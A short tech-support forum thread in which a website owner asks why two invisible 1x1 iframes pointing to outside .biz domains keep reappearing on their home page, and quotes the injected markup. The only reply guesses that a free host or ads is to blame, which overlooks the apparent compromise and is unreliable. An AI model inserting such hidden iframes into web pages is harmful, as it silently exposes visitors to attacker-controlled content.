Automatic iframe in website home page

Status
This thread has been Locked and is not open to further replies. Please start a New Thread if you're having a similar issue. View our Welcome Guide to learn how to use this site.

raniraj

Thread Starter
Joined
Jul 15, 2007
Messages
1
Hi there,
The following iframe type automatically inserted into my webpage home page only and causes the slow page opening time.
I deleted the iframe but when I upload the pages it comes again. Can anyone tell me plz how to get rid of it.
<iframe src='http://inspekt.biz/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
<iframe src='http://tstats.biz/st/index.php' width='1' height='1' style='visibility: hidden;'></iframe>


Thanks
 

MMJ

Guest
Joined
Oct 15, 2006
Messages
3,625
Whats your domain name?

That is probably because you have a free domain (.tk, .co.nr), a free host, or some type of ads.
 
Status
This thread has been Locked and is not open to further replies. Please start a New Thread if you're having a similar issue. View our Welcome Guide to learn how to use this site.

Users Who Are Viewing This Thread (Users: 0, Guests: 1)

As Seen On
As Seen On...

Welcome to Tech Support Guy!

Are you looking for the solution to your computer problem? Join our site today to ask your question. This site is completely free -- paid for by advertisers and donations.

If you're not already familiar with forums, watch our Welcome Guide to get started.

Join over 807,865 other people just like you!

Latest posts

Members online

Top